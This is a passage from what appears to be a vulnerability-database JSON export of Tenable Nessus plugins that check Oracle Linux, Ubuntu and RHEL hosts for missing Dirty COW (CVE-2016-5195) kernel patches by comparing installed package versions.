(CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-October/006443.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-2105\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-abi-whitelists-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-abi-whitelists-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-devel-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-devel-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-doc-2.6.32\") && rpm_check(release:\"EL6\", 
reference:\"kernel-doc-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-firmware-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-firmware-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-headers-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-headers-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perf-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"python-perf-2.6.32-642.6.2.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:21:46", "description": "It was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-20T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerability (USN-3105-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3105-1.NASL", "href": "https://www.tenable.com/plugins/nessus/94153", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3105-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94153);\n script_version(\"2.17\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"USN\", value:\"3105-1\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerability (USN-3105-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. 
A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3105-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic,\nlinux-image-3.13-generic-lpae and / or linux-image-3.13-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3105-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-100-generic\", pkgver:\"3.13.0-100.147\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-100-generic-lpae\", pkgver:\"3.13.0-100.147\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-100-lowlatency\", pkgver:\"3.13.0-100.147\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:21:48", "description": "USN-3106-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-20T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-xenial vulnerability (USN-3106-2) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3106-2.NASL", "href": "https://www.tenable.com/plugins/nessus/94156", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3106-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94156);\n script_version(\"2.17\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"USN\", value:\"3106-2\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial vulnerability (USN-3106-2) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3106-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. 
This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3106-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.4-generic,\nlinux-image-4.4-generic-lpae and / or linux-image-4.4-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3106-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-45-generic\", pkgver:\"4.4.0-45.66~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-45-generic-lpae\", pkgver:\"4.4.0-45.66~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-45-lowlatency\", pkgver:\"4.4.0-45.66~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-generic / linux-image-4.4-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T05:33:34", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "edition": 43, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-24T00:00:00", "title": "RHEL 7 : kernel (RHSA-2016:2098) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", 
"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "cpe:/o:redhat:enterprise_linux:7.3", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2016-2098.NASL", "href": "https://www.tenable.com/plugins/nessus/94230", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2098. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94230);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"RHSA\", value:\"2016:2098\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2016:2098) (Dirty COW)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2098\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5195\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 